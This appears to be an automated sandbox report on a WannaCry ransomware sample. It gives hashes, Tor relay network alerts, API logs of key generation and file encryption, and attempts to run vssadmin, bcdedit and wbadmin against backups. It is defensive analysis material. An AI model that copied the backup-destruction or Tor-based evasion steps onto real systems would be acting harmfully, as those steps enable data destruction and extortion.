Summary | ZeroBOX

WannaCry.exe

Suspicious_Script_Bin Generic Malware Malicious Library Downloader Admin Tool (Sysinternals etc ...) Antivirus UPX Code injection DGA HTTP Hijack Network Create Service Sniff Audio Internet API DNS Http API ScreenShot Steal credential Socket PWS BitCoin
Category Machine Started Completed
FILE s1_win7_x6401 June 19, 2023, 4:16 p.m. June 19, 2023, 4:18 p.m.
Size 3.4MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 84c82835a5d21bbcf75a61706d8ab549
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
CRC32 4022FCAA
ssdeep 98304:QqPoBhz1aRxcSUDk36SAEdhvxWa9P593R8yAVp2g3x:QqPe1Cxcxk3ZAEUadzR8yc4gB
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
163.172.13.165 Active Moloch
164.124.101.2 Active Moloch
171.25.193.9 Active Moloch
193.11.164.243 Active Moloch
81.7.10.93 Active Moloch
89.147.109.179 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 193.11.164.243:9001 -> 192.168.56.101:49183 2522343 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 344 Misc Attack
TCP 192.168.56.101:49183 -> 193.11.164.243:9001 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 89.147.109.179:443 -> 192.168.56.101:49200 2522795 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 796 Misc Attack
TCP 193.11.164.243:9001 -> 192.168.56.101:49183 2018789 ET POLICY TLS possible TOR SSL traffic Misc activity
TCP 192.168.56.101:49200 -> 89.147.109.179:443 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 171.25.193.9:80 -> 192.168.56.101:49184 2522270 ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 271 Misc Attack
TCP 192.168.56.101:49184 -> 171.25.193.9:80 2028377 ET JA3 Hash - Possible Malware - Malspam Unknown Traffic
TCP 171.25.193.9:80 -> 192.168.56.101:49184 2018789 ET POLICY TLS possible TOR SSL traffic Misc activity

Suricata TLS

Flow Issuer Subject Fingerprint
TLS 1.2 192.168.56.101:49183 -> 193.11.164.243:9001 CN=www.4wd6i4yj2bf.com CN=www.un744uplalol4b6y2.net 5c:6e:3b:08:5f:a9:ee:51:db:11:bf:b3:1e:a7:35:86:65:a8:d6:d4
TLS 1.2 192.168.56.101:49200 -> 89.147.109.179:443 CN=www.gglks3sz.com CN=www.jd7d2yfbp5v.net 05:87:c0:34:cb:76:9e:89:a3:0e:18:ec:b9:8d:19:57:90:5f:18:9e
TLS 1.2 192.168.56.101:49184 -> 171.25.193.9:80 CN=www.hdvpy7r4rywlcaqdia4k.com CN=www.vt7d6yxmxd4wr2zppe.net 07:3d:9a:29:9e:68:46:c6:c8:e6:49:b1:61:d5:e1:4c:30:05:5a:c0

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Successfully processed 183 files; Failed processing 0 files
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: The batch file cannot be found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.427 [notice] Tor 0.2.9.10 (git-1f6c8eda0073f464) running on Windows 7 with Libevent 2.0.22-stable, OpenSSL 1.0.2k and Zlib 1.2.8.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.443 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.443 [notice] Configuration file "C:\Users\test22\AppData\Roaming\tor\torrc" not present, using reasonable defaults.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.458 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\test22\AppData\Local\Temp\<default>. Is this what you wanted?
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.458 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\test22\AppData\Local\Temp\<default>. Is this what you wanted?
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.458 [notice] Opening Socks listener on 127.0.0.1:9050
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:08.000 [notice] Bootstrapped 0%: Starting
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:10.000 [notice] Bootstrapped 5%: Connecting to directory server
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:10.000 [notice] Bootstrapped 10%: Finishing handshake with directory server
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 15%: Establishing an encrypted directory connection
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 20%: Asking for networkstatus consensus
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:11.000 [notice] Bootstrapped 25%: Loading networkstatus consensus
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:14.000 [warn] Received directory with skewed time (DIRSERV:171.25.193.9:80): It seems that our clock is ahead by 6 hours, 39 minutes, or that theirs is behind. Tor requires an accurate clock to work: please check your time, timezone, and date settings.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:15.000 [notice] I learned some more directory information, but not enough to build a circuit: We have no usable consensus.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:15.000 [notice] Bootstrapped 40%: Loading authority key certs
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:16.000 [warn] Received directory with skewed time (DIRSERV:171.25.193.9:80): It seems that our clock is ahead by 6 hours, 40 minutes, or that theirs is behind. Tor requires an accurate clock to work: please check your time, timezone, and date settings.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:16.000 [warn] At least one protocol listed as recommended in the consensus is not supported by this version of Tor. You should upgrade. This version of Tor will eventually stop working as a client on the Tor network. The missing protocols are: DirCache=2 HSDir=2 HSIntro=4 Link=4-5
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:18.000 [notice] Bootstrapped 45%: Asking for relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:18.000 [notice] I learned some more directory information, but not enough to build a circuit: We need more microdescriptors: we have 0/6833, and can only build 0% of likely paths. (We have 0% of guards bw, 0% of midpoint bw, and 0% of exit bw = 0% of path bw.)
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:20.000 [notice] Bootstrapped 50%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:55.000 [notice] Bootstrapped 55%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:56.000 [notice] Bootstrapped 62%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:57.000 [notice] Bootstrapped 72%: Loading relay descriptors
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:58.000 [notice] Bootstrapped 80%: Connecting to the Tor network
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:57:58.000 [notice] Bootstrapped 90%: Establishing a Tor circuit
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:58:00.000 [notice] Tor has successfully opened a circuit. Looks like client functionality is working.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:58:00.000 [notice] Bootstrapped 100%: Done
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Jun 19 22:58:15.000 [warn] Received http status code 404 ("Not found") from server '89.147.109.179:443' while fetching "/tor/keys/fp/D586D18309DED4CD6D57C18FDB97EFA96D330566+EFCBE720AB3A82B99F9E953CD5BF50F7EEFC7B97".
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: Error: Unexpected failure: Class not registered
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ERROR: Description = Initialization failure
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptGenKey

crypto_handle: 0x00b77b50
algorithm_identifier: 0x00000001 ()
flags: 134217729
key:
provider_handle: 0x00b6dbb8
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

crypto_handle: 0x00b77b50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 7
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
resource name XIA
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
IWICColorContext_InitializeFromMemory_Proxy+0x37187 windowscodecs+0xd8660 @ 0x736a8660
WICConvertBitmapSource+0x2472b WICMapGuidToShortName-0x10e74 windowscodecs+0x8f797 @ 0x7365f797
DllGetClassObject+0x12362 WICSerializeMetadataContent-0x7277 windowscodecs+0x23362 @ 0x735f3362
DllGetClassObject+0x118b1 WICSerializeMetadataContent-0x7d28 windowscodecs+0x228b1 @ 0x735f28b1
DllGetClassObject+0x11788 WICSerializeMetadataContent-0x7e51 windowscodecs+0x22788 @ 0x735f2788
DllGetClassObject+0x12659 WICSerializeMetadataContent-0x6f80 windowscodecs+0x23659 @ 0x735f3659
DllGetClassObject+0x8e24 WICSerializeMetadataContent-0x107b5 windowscodecs+0x19e24 @ 0x735e9e24
DllGetClassObject+0x8c6d WICSerializeMetadataContent-0x1096c windowscodecs+0x19c6d @ 0x735e9c6d
iconcodecservice+0x14c8 @ 0x742114c8
SetKeyboardState+0xe587 CliImmSetHotKey-0x52d4 user32+0x4fa39 @ 0x7588fa39
LookupIconIdFromDirectoryEx+0x362 DdeCreateDataHandle-0x622 user32+0x2f316 @ 0x7586f316
CopyImage+0x4f SetWindowPlacement-0x5e user32+0x24a58 @ 0x75864a58
CopyImage+0xa3 SetWindowPlacement-0xa user32+0x24aac @ 0x75864aac
DdeConnectList+0xcec GetKeyNameTextW-0xc20 user32+0x5fb81 @ 0x7589fb81
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x76f2011a
GetThemeBool+0x84e GetThemeTextExtent-0x1b5f uxtheme+0x16e9f @ 0x73bc6e9f
GetThemeBool+0x8c0 GetThemeTextExtent-0x1aed uxtheme+0x16f11 @ 0x73bc6f11
SystemParametersInfoW+0x40 GetWindowThreadProcessId-0xa1 user32+0x19113 @ 0x75859113
TaskStart-0xabc @ 0x10005024

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc0000002
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1625012
registers.edi: 11953384
registers.eax: 1625012
registers.ebp: 1625092
registers.edx: 5373
registers.ebx: 4094
registers.esi: 11952736
registers.ecx: 5374
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 43708040
registers.edi: 4130524
registers.eax: 43708040
registers.ebp: 43708120
registers.edx: 53
registers.ebx: 43708404
registers.esi: 2147746133
registers.ecx: 3891536
1 0 0

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x761ac048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76178926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x7617d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x761ac44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x7617d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x7617d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x7617d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x7617991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76178d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72466f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72466e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x724627a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72462652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7246253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72462411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x724625ab
wmic+0x39c80 @ 0xfc9c80
wmic+0x3b06a @ 0xfcb06a
wmic+0x3b1f8 @ 0xfcb1f8
wmic+0x36fcd @ 0xfc6fcd
wmic+0x3d6e9 @ 0xfcd6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 648560
registers.edi: 1953561104
registers.eax: 648560
registers.ebp: 648640
registers.edx: 1
registers.ebx: 3861212
registers.esi: 2147746133
registers.ecx: 726632172
1 0 0

__exception__

stacktrace:
IWICColorContext_InitializeFromMemory_Proxy+0x37187 windowscodecs+0xd8660 @ 0x736a8660
WICConvertBitmapSource+0x2472b WICMapGuidToShortName-0x10e74 windowscodecs+0x8f797 @ 0x7365f797
DllGetClassObject+0x12362 WICSerializeMetadataContent-0x7277 windowscodecs+0x23362 @ 0x735f3362
DllGetClassObject+0x118b1 WICSerializeMetadataContent-0x7d28 windowscodecs+0x228b1 @ 0x735f28b1
DllGetClassObject+0x11788 WICSerializeMetadataContent-0x7e51 windowscodecs+0x22788 @ 0x735f2788
DllGetClassObject+0x12659 WICSerializeMetadataContent-0x6f80 windowscodecs+0x23659 @ 0x735f3659
DllGetClassObject+0x8e24 WICSerializeMetadataContent-0x107b5 windowscodecs+0x19e24 @ 0x735e9e24
DllGetClassObject+0x8c6d WICSerializeMetadataContent-0x1096c windowscodecs+0x19c6d @ 0x735e9c6d
iconcodecservice+0x14c8 @ 0x742114c8
SetKeyboardState+0xe587 CliImmSetHotKey-0x52d4 user32+0x4fa39 @ 0x7588fa39
LookupIconIdFromDirectoryEx+0x362 DdeCreateDataHandle-0x622 user32+0x2f316 @ 0x7586f316
CopyImage+0x4f SetWindowPlacement-0x5e user32+0x24a58 @ 0x75864a58
CopyImage+0xa3 SetWindowPlacement-0xa user32+0x24aac @ 0x75864aac
DdeConnectList+0xcec GetKeyNameTextW-0xc20 user32+0x5fb81 @ 0x7589fb81
KiUserCallbackDispatcher+0x2e KiUserExceptionDispatcher-0x1a ntdll+0x1011a @ 0x76f2011a
GetThemeBool+0x84e GetThemeTextExtent-0x1b5f uxtheme+0x16e9f @ 0x73bc6e9f
GetThemeBool+0x8c0 GetThemeTextExtent-0x1aed uxtheme+0x16f11 @ 0x73bc6f11
SystemParametersInfoW+0x40 GetWindowThreadProcessId-0xa1 user32+0x19113 @ 0x75859113
@wanadecryptor@+0x7f6d @ 0x407f6d
0x1

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc0000002
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 1626164
registers.edi: 5031984
registers.eax: 1626164
registers.ebp: 1626244
registers.edx: 16
registers.ebx: 4094
registers.esi: 5031336
registers.ecx: 17
1 0 0
Time & API Arguments Status Return Repeated

bind

ip_address: 0.0.0.0
socket: 276
port: 0
1 0 0

bind

ip_address: 0.0.0.0
socket: 292
port: 0
1 0 0

bind

ip_address: 0.0.0.0
socket: 276
port: 0
1 0 0

bind

ip_address: 0.0.0.0
socket: 292
port: 0
1 0 0

bind

ip_address: 127.0.0.1
socket: 348
port: 0
1 0 0

listen

socket: 348
backlog: 1
1 0 0

accept

ip_address: 127.0.0.1
socket: 348
port: 49182
1 416 0

bind

ip_address: 127.0.0.1
socket: 348
port: 9050
1 0 0

listen

socket: 348
backlog: 2147483647
1 0 0

accept

ip_address: 127.0.0.1
socket: 348
port: 49201
1 524 0

accept

ip_address: 127.0.0.1
socket: 348
port: 49202
1 524 0

accept

ip_address: 127.0.0.1
socket: 348
port: 49915
1 524 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2980
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73572000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1452
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000092f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2264
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2592
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 2347008
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00041000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3012
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72411000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 284
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ce2000
process_handle: 0xffffffff
1 0 0
description WannaCry.exe tried to sleep 802 seconds, actually delayed analysis time by 802 seconds
description explorer.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 12972339200
free_bytes_available: 12972339200
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 12737273856
free_bytes_available: 12737273856
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 12525162496
free_bytes_available: 12525162496
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 12075646976
free_bytes_available: 12075646976
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11862364160
free_bytes_available: 11862364160
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11904839680
free_bytes_available: 11904839680
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11695083520
free_bytes_available: 11695083520
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11485577216
free_bytes_available: 11485577216
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11558100992
free_bytes_available: 11558100992
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 11348238336
free_bytes_available: 11348238336
root_path: C:\
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 12737413120
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.2_0\_locales\pt_PT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\tr\~SDB5F.tmp
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\cast_app.js.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\da
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\hu\~SDA64.tmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt.WNCRYT
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\it
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\7619.603.0.2_0\cast_setup\chromecast_logo_grey.png.WNCRY
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\it\~SDA76.tmp
